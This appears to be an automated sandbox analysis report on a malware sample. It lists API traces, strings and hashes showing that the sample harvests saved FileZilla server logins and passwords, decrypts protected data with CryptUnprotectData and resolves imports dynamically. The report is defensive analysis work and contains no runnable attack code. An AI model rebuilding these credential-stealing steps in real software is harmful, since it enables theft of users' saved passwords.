                                      • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                      • Instruction ID: 2ecf1c42c9a29d5f6582c9649e02d9f7894492c9610eb12395c7169c80dcbcb8
                                      • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                      • Instruction Fuzzy Hash: A312EB72A10228DBCB18FB60ED96FED737AAF94700F4041ADB54A52495EE345F88CF52
                                      APIs
                                      • CryptBinaryToStringA.CRYPT32(00000000,009153EB,40000001,00000000,00000000,?,009153EB), ref: 00929127
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptString
                                      • String ID:
                                      • API String ID: 80407269-0
                                      • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                      • Instruction ID: 7a9606637c859dc47abe3eae0035e8c26253f2980199f33a865beba751ad4024
                                      • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                      • Instruction Fuzzy Hash: B5111C74208205BFDB00CF99EC89FA733AAAF89744F109958F9098B255D775E852DB60
                                      APIs
                                      • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptString
                                      • String ID:
                                      • API String ID: 80407269-0
                                      • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                      • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                      • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                      • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                      APIs
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00915155,00000000,00000000), ref: 00919D56
                                      • LocalAlloc.KERNEL32(00000040,?,?,?,00915155,00000000,?), ref: 00919D68
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00915155,00000000,00000000), ref: 00919D91
                                      • LocalFree.KERNEL32(?,?,?,?,00915155,00000000,?), ref: 00919DA6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptLocalString$AllocFree
                                      • String ID:
                                      • API String ID: 4291131564-0
                                      • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                      • Instruction ID: e31845b4efd9675b31a836735f7bb5b1612a77976c5969d59eda2a6900dd52a5
                                      • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                      • Instruction Fuzzy Hash: DD1192B8240208AFEB10CFA4D895BAA77A9FB89704F208058FD159F390C676A941CB90
                                      APIs
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00919DEB
                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00919E0A
                                      • memcpy.MSVCRT(?,?,?), ref: 00919E2D
                                      • LocalFree.KERNEL32(?), ref: 00919E3A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                      • String ID:
                                      • API String ID: 3243516280-0
                                      • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                      • Instruction ID: f30c523ee908f1a9e8f6e8a4284a1b027c355af617cf852ffd6f98c5e06ded3e
                                      • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                      • Instruction Fuzzy Hash: B511F7B8A00209EFDB04CFA8D985AEEB7B9FF89300F104558E915A7350D730AE50CFA1
                                      APIs
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                      • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                      • LocalFree.KERNEL32(?), ref: 00409BD3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                      • String ID:
                                      • API String ID: 3243516280-0
                                      • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                      • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                      • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                      • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,009DB348,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,009DB348,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,009DB348,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                      • wsprintfA.USER32 ref: 00417AB7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                      • String ID:
                                      • API String ID: 362916592-0
                                      • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                      • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                      • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                      • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                      APIs
                                      • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharCreateInstanceMultiWide
                                      • String ID:
                                      • API String ID: 123533781-0
                                      • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                      • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                                      • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                      • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: .$GetProcAddress.$l
                                      • API String ID: 0-2784972518
                                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                      • Instruction ID: e08c7699c7895d660b383c8bb82ccdf72c257c16ef682c7a5c75e9f8b1f8902b
                                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                      • Instruction Fuzzy Hash: 1D313CB6A00609DFDB10CF99C884AEDBBF9FF48324F15404AD441A7351D7B5EA85CBA4
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(0041CEA8), ref: 0092D156
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                      • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                      • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                      • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0041CEEF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                      • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                      • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                      • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904673836.00000000009AA000.00000040.00000020.00020000.00000000.sdmp, Offset: 009AA000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_9aa000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                      • Instruction ID: 78e51d3b183e5f92ca5788c9c806686f5a68b78671cf16e5134b5e40ede7e5dc
                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                      • Instruction Fuzzy Hash: 16118E72340100AFD754DF95DC81FA673EAEB8A320B29806AED04CB316D779EC01C7A0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                      • Instruction ID: 136bc12de02d61290505308228601e6655d4014272982125dcc64806225a3762
                                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                      • Instruction Fuzzy Hash: 0501A276B006088FDF21CF64D805BEA33E9EBC6316F4544A5D90A9B285E7B4A9C18F90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                      • Instruction ID: a2ce4e0807918919ad9622eb776909168d531a0c8973c2ecd0f64cae767dadca
                                      • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                      • Instruction Fuzzy Hash: 9D71E532451B60DBD7633B31FD03F4A7AB27F84302F104924B1DB28DB6DA3268699B52
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                        • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                        • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                        • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                        • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                        • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                        • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                      • strtok_s.MSVCRT ref: 0041031B
                                      • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                      • lstrlenA.KERNEL32(00000000), ref: 00410393
                                        • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                        • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                      • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                      • lstrlenA.KERNEL32(00000000), ref: 00410427
                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                      • lstrlenA.KERNEL32(00000000), ref: 00410475
                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                      • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                      • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                      • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                      • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                      • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                      • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                      • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                      • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                      • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                      • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                      • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                      • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                      • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                      • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                      • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                      • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                      • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                      • strtok_s.MSVCRT ref: 00410679
                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                      • memset.MSVCRT ref: 004106DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                      • API String ID: 337689325-514892060
                                      • Opcode ID: d703adcf312afa78f567e3413873f3226fbd2fc71e0b914fded6cee151632d1c
                                      • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                      • Opcode Fuzzy Hash: d703adcf312afa78f567e3413873f3226fbd2fc71e0b914fded6cee151632d1c
                                      • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                      APIs
                                      • lstrlen.KERNEL32(00424DA0), ref: 00914833
                                      • lstrlen.KERNEL32(00424E50), ref: 0091483E
                                      • lstrlen.KERNEL32(00424F18), ref: 00914849
                                      • lstrlen.KERNEL32(00424FD0), ref: 00914854
                                      • lstrlen.KERNEL32(00425078), ref: 0091485F
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 0091486E
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00914875
                                      • lstrlen.KERNEL32(00425120), ref: 00914883
                                      • lstrlen.KERNEL32(004251C8), ref: 0091488E
                                      • lstrlen.KERNEL32(00425270), ref: 00914899
                                      • lstrlen.KERNEL32(00425318), ref: 009148A4
                                      • lstrlen.KERNEL32(004253C0), ref: 009148AF
                                      • lstrlen.KERNEL32(00425468), ref: 009148C3
                                      • lstrlen.KERNEL32(00425510), ref: 009148CE
                                      • lstrlen.KERNEL32(004255B8), ref: 009148D9
                                      • lstrlen.KERNEL32(00425660), ref: 009148E4
                                      • lstrlen.KERNEL32(00425708), ref: 009148EF
                                      • lstrlen.KERNEL32(004257B0), ref: 00914918
                                      • lstrlen.KERNEL32(00425858), ref: 00914923
                                      • lstrlen.KERNEL32(00425920), ref: 0091492E
                                      • lstrlen.KERNEL32(004259C8), ref: 00914939
                                      • lstrlen.KERNEL32(?), ref: 00914944
                                      • strlen.MSVCRT ref: 00914957
                                      • lstrlen.KERNEL32(00425B18), ref: 0091497F
                                      • lstrlen.KERNEL32(00425BC0), ref: 0091498A
                                      • lstrlen.KERNEL32(00425C68), ref: 00914995
                                      • lstrlen.KERNEL32(00425D10), ref: 009149A0
                                      • lstrlen.KERNEL32(00425DB8), ref: 009149AB
                                      • lstrlen.KERNEL32(00425E60), ref: 009149BB
                                      • lstrlen.KERNEL32(00425F08), ref: 009149C6
                                      • lstrlen.KERNEL32(00425FB0), ref: 009149D1
                                      • lstrlen.KERNEL32(00426058), ref: 009149DC
                                      • lstrlen.KERNEL32(00426100), ref: 009149E7
                                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00914A03
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                      • String ID:
                                      • API String ID: 2127927946-0
                                      • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                      • Instruction ID: 375df5c4e76f271552f11f7ee8e08e0169bad2d06eab0a88a481078b30061fac
                                      • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                      • Instruction Fuzzy Hash: 3841BA79740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90295190CBB5D5119B3D
                                      APIs
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 00929B08
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 00929B21
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 00929B39
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 00929B51
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 00929B6A
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 00929B82
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 00929B9A
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 00929BB3
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 00929BCB
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 00929BE3
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 00929BFC
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 00929C14
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 00929C2C
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 00929C45
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 00929C5D
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 00929C75
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 00929C8E
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 00929CA6
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 00929CBE
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 00929CD7
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 00929CEF
